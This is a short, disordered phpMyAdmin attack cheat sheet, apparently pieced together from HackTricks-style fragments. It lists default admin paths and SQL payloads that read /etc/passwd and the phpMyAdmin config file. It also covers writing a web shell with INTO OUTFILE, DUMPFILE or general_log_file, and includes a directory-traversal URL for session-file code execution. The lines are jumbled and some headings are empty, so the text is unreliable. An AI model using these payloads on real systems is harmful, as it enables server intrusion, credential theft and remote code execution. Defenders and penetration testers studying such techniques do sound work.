phpMyAdmin HackTricks Jun 2026
SYSTEM('whoami');
💡 If INTO OUTFILE fails, try INTO DUMPFILE or use general_log_file to write a shell.
Here’s your 60-second phpMyAdmin attack checklist 👇
SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE('/var/www/html/config.inc.php');
By manipulating the target parameter in the URL with directory traversal sequences (e.g., index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_[SESSION_ID]), the attacker forces phpMyAdmin to include and execute the session file containing the malicious code.
Writing a Web Shell (SELECT ... INTO OUTFILE)
/phpmyadmin, /pma, /db/admin, /mysql/admin
Dump entire databases using the "Export" tab or SQL queries.
🛠️ Common Payloads & Commands
SQL / Action
SELECT user, file_priv FROM mysql.user WHERE user='root'; See if you can write files.
Write Web Shell